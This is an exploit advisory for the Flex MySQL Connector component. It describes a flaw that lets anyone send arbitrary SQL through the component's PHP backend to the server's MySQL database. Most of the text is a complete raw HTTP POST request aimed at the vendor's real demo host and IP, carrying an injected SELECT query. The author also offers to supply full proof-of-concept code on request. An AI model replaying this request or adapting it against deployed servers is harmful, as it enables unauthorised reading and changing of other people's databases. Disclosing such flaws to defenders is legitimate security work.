$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$ Flex MySQL Connector Remote SQL Execution Exploit $$$ $$$ $$$ $$$ || License: Commercial $$$ $$$ || Language: English $$$ $$$ Flex MySQL Connector || Cost: $45.00 $$$ $$$ || Platform: Flash Player 9 | Flash Player 10 $$$ $$$ || Demo: http://flexappsstore.com/flexapps/demo/mysql/ $$$ $$$ $$$ $$$ || Name: ~Fyodor (aka DungPQ) $$$ $$$ Credit || Email: quangdung181188[at]gmail.com $$$ $$$ || Location: Hanoi, Vietnam $$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ [$] Vulnz Description : Flex MySQL Connector is a Flex Component from FlexAppsStore, which allow run SQL from ActionScript via PHP backend (Flash <=> PHP <=> MySQL). But anybody can modify the SQL command in Request packet and send to PHP backend, it means anybody can query SQL commands to victim's MySQL server => OMG ! [$] Exploitz : Send Example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/ ----------------------------------------------------------------------------------- > Dest.IP = 66.147.242.177 > Dest.PORT = 80 ---[Request BOF]--- POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1 User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10 Host: www.flexappsstore.com Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: en-US,en;q=0.9 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf Connection: Keep-Alive, TE TE: deflate, gzip, chunked, identity, trailers Content-Length: 89 Content-type: application/x-www-form-urlencoded fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig ---[Request EOF]--- (Oh yeah, SQL command is SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig) [$] PS: I don't give full PoC sourcecode. You can make your PoC by PHP (using fsockopen(), cUrl, ...) but if you want, contact me. ^_^ [$] ~Fyodor - The Still Lake